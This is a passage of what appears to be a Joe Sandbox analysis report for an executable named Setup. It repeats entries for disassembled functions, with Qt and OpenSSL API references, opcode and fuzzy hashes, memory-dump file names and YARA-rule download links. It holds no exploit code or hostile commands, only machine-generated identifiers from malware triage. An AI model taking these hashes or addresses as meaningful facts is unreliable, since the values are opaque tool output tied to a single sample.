                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_get_ext_d2i
                                                                                                                                                              • API String ID: 646154281-2088506088
                                                                                                                                                              • Opcode ID: e7fe2c8a01d351c83cf198b276e4940eea70195005e8cb9e752d5b3dca80ea37
                                                                                                                                                              • Instruction ID: 267f7eabc0a5c66893e33844c953cc5731e72dbe7da3c412783d5eb4948b733a
                                                                                                                                                              • Opcode Fuzzy Hash: e7fe2c8a01d351c83cf198b276e4940eea70195005e8cb9e752d5b3dca80ea37
                                                                                                                                                              • Instruction Fuzzy Hash: 2FF09095F0FA8281EBC39B71EC112A53392AF84B50F408137DD6D8B321FF2CA1458E00
                                                                                                                                                              Function 00007FFBA1A32E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EA8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32ECD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EE4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_sk_value$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-387275786
                                                                                                                                                              • Opcode ID: 2f40f0cf27371a104878b2d324238a011ea552a07b2de2f34e409c7fd10a3d69
                                                                                                                                                              • Instruction ID: 26255b2dc8855b4564581205b98bab3d99cd2aa182bb7f18421e608cef9c26eb
                                                                                                                                                              • Opcode Fuzzy Hash: 2f40f0cf27371a104878b2d324238a011ea552a07b2de2f34e409c7fd10a3d69
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF09095E0EA9281EBC3AB71E8112A53692BF84B10B809037DD6D4B721FE2C90458F00
                                                                                                                                                              Function 00007FFBA1A31680 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A31698
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A316BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A459C3), ref: 00007FFBA1A316D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DTLS_client_method$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1639995455
                                                                                                                                                              • Opcode ID: c3d631a4ec2a29779fac3fea190be8c1523c3948fc439f1e6adb980b5e36a0c4
                                                                                                                                                              • Instruction ID: 23615f94cf9d4d649c5e1a11d81597b1b94db5033fea40cdbd13c558c999e33f
                                                                                                                                                              • Opcode Fuzzy Hash: c3d631a4ec2a29779fac3fea190be8c1523c3948fc439f1e6adb980b5e36a0c4
                                                                                                                                                              • Instruction Fuzzy Hash: BBF0B4A5F1EA8281EFC39BB5E8116A53392AF84B10B448537DD6D4B321FF2CD0458F00
                                                                                                                                                              Function 00007FFBA1A33670 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A33688
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A336AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40EBA), ref: 00007FFBA1A336C4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_RSAPrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3318088885
                                                                                                                                                              • Opcode ID: 854e36d8d18b47586313a958d846fe61e808a132512ce920ba796aab8fac126b
                                                                                                                                                              • Instruction ID: c4a4ac298b6504f36a8caf53b3a5d8ce05e098d8dfe3aea975f794228d5146c9
                                                                                                                                                              • Opcode Fuzzy Hash: 854e36d8d18b47586313a958d846fe61e808a132512ce920ba796aab8fac126b
                                                                                                                                                              • Instruction Fuzzy Hash: C2F09095F0EA5281EFD29B71E8126A62391BF84710F804037DD6D8B221EE2CD455CE00
                                                                                                                                                              Function 00007FFBA1A31E60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31E78
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31E9D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F32), ref: 00007FFBA1A31EB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_set1_DH$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1275201279
                                                                                                                                                              • Opcode ID: 875c53b4ffa68bc4bfaaf92163b13f4233b8aebcc212c8375a61a6348f1e52af
                                                                                                                                                              • Instruction ID: 97be4a5ee2121c032b6d5880c7227e190319e2bbb908bcc77d1002cd42dee1f5
                                                                                                                                                              • Opcode Fuzzy Hash: 875c53b4ffa68bc4bfaaf92163b13f4233b8aebcc212c8375a61a6348f1e52af
                                                                                                                                                              • Instruction Fuzzy Hash: 60F06DA5E0EA9281EB83AB35E8112A43252BF84B10F408237ED6D4B3A1EE2C94058E00
                                                                                                                                                              Function 00007FFBA1A33600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A33618
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A3363D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F7E), ref: 00007FFBA1A33654
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_PrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-261683688
                                                                                                                                                              • Opcode ID: 583791d82ab606c00c0eb61f5390965f92c949a81c3dd2eb472e81905f01a0e6
                                                                                                                                                              • Instruction ID: 85ecea278e14bb61944e0a993078ebb2654bceccdc0c6471a7c1cc38f274703c
                                                                                                                                                              • Opcode Fuzzy Hash: 583791d82ab606c00c0eb61f5390965f92c949a81c3dd2eb472e81905f01a0e6
                                                                                                                                                              • Instruction Fuzzy Hash: 62F0B4A5F0E65281EFD39B71EC126A62791BF84710F809037DD6D4B261EF2CD415CE00
                                                                                                                                                              Function 00007FFBA1A31DF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F1E), ref: 00007FFBA1A31E44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_new$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-74362941
                                                                                                                                                              • Opcode ID: 4288942be010ca33f9cd5d02423c0e32785b3b7d3370894191434379de0074c0
                                                                                                                                                              • Instruction ID: 918d62e0927faf24277a6edcd07ca8a72df5b78bbc88a689026a98402c1da9f2
                                                                                                                                                              • Opcode Fuzzy Hash: 4288942be010ca33f9cd5d02423c0e32785b3b7d3370894191434379de0074c0
                                                                                                                                                              • Instruction Fuzzy Hash: E7F06D95F0AA8281EB83AB71E8122B53292AF84B10B408037DD6D4B321EE2CD0058E00
                                                                                                                                                              Function 00007FFBA1A305E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EEE4), ref: 00007FFBA1A305F8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EEE4), ref: 00007FFBA1A3061D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EEE4), ref: 00007FFBA1A30634
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: ASN1_STRING_get0_data$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2128785683
                                                                                                                                                              • Opcode ID: b440ae49c33ba09086998192894821174cf882f45f8034035058728fb357e49b
                                                                                                                                                              • Instruction ID: f91ff3c0bf6f06ee753ea552bc61b4ec653a349ef7041eabf273f46516dcd55d
                                                                                                                                                              • Opcode Fuzzy Hash: b440ae49c33ba09086998192894821174cf882f45f8034035058728fb357e49b
                                                                                                                                                              • Instruction Fuzzy Hash: F9F0B4A5F1EA8281EFC39B75E8116A53392AF84B10B409037DD6D4B331FF2CD4458E00
                                                                                                                                                              Function 00007FFBA1A32D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D58
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D7D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D94
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_sk_num$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1285769871
                                                                                                                                                              • Opcode ID: 259adaa94544201f13d1743189002939cbc53654055947982e0d5ed689699680
                                                                                                                                                              • Instruction ID: b8c8b2db592d4025240517c613bc581ede2cc19befd46eb99e5f1309e5169d3a
                                                                                                                                                              • Opcode Fuzzy Hash: 259adaa94544201f13d1743189002939cbc53654055947982e0d5ed689699680
                                                                                                                                                              • Instruction Fuzzy Hash: D5F09695E0EA8281EBD39735D8156A43352AF44B50B405137DD7D4B360FE2C94098F00
                                                                                                                                                              Function 00007FFBA1A33520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FA6), ref: 00007FFBA1A33538
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FA6), ref: 00007FFBA1A3355D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FA6), ref: 00007FFBA1A33574
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_EC_PUBKEY$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1868066820
                                                                                                                                                              • Opcode ID: 5a44319e095a47320a08634689bd4933e82c9f48593df12d3d596c209d02c124
                                                                                                                                                              • Instruction ID: 593b75c17612adbc9208987bb7e00f06cd0e544f17386eca9bcd5b3f38fd25ce
                                                                                                                                                              • Opcode Fuzzy Hash: 5a44319e095a47320a08634689bd4933e82c9f48593df12d3d596c209d02c124
                                                                                                                                                              • Instruction Fuzzy Hash: 3EF09095F1EA8281EBC39B71E8012A53392BF84B10F809137DD6D8B361FE2C91058F00
                                                                                                                                                              Function 00007FFBA1A33590 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F47), ref: 00007FFBA1A335A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F47), ref: 00007FFBA1A335CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F47), ref: 00007FFBA1A335E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
